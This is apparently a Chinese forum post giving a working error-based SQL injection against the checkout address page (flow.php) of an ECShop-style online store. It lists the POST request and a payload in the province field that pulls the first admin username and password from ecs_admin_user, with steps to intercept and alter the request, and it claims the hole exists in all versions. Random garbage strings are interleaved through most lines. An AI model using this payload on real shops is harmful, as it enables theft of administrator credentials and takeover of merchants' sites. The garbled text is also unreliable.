感谢欠杀的黑盒
, x4 N" V3 d; T' j, V D: b3 e
3 ?$ h/ c; [+ g" n& ^! [# F . h$ K8 I! H/ ]/ q1 l! L `
把任意商品加入购物车在填写配送地址那一页,有地区选择
, h+ h$ C6 P* z5 @/ s/ {) p9 j 2 D2 h' w9 s" Y: L& P
flow.php?step=consignee&direct_shopping=1
0 W7 l# D8 G# x1 y3 u6 {. f: K比如省选择安徽
. i- b9 I0 U% h2 _% _9 w
1 U2 Y5 U0 f/ B& | C其中POST数据如下
& d& A, F# |2 U3 X/ S, L
4 m8 Y+ f r+ N' x5 qcountry=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
7 B8 K4 f0 ]* \改成
( j+ \4 Y! K+ H9 R5 _: R , f6 i" @% G! D
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
/ s5 o5 W. t1 b. @) }2 M$ E- R$ aps:详细的方法,用火狐tamper data插件……..即可改post内容…..
( F: @% z6 x# x" _6 j
* N, T1 T# g, L( r4 O3 O9 q7 h3 p先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
0 L) k: j1 v1 _! M1 ~6 d8 w
3 [" U/ n/ l& ^' @就会回显错误页面了。。。。9 r: ~3 U; i. v' X0 t
! t; `$ M; s" O- L
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
6 ^4 M# T* G5 S0 { B |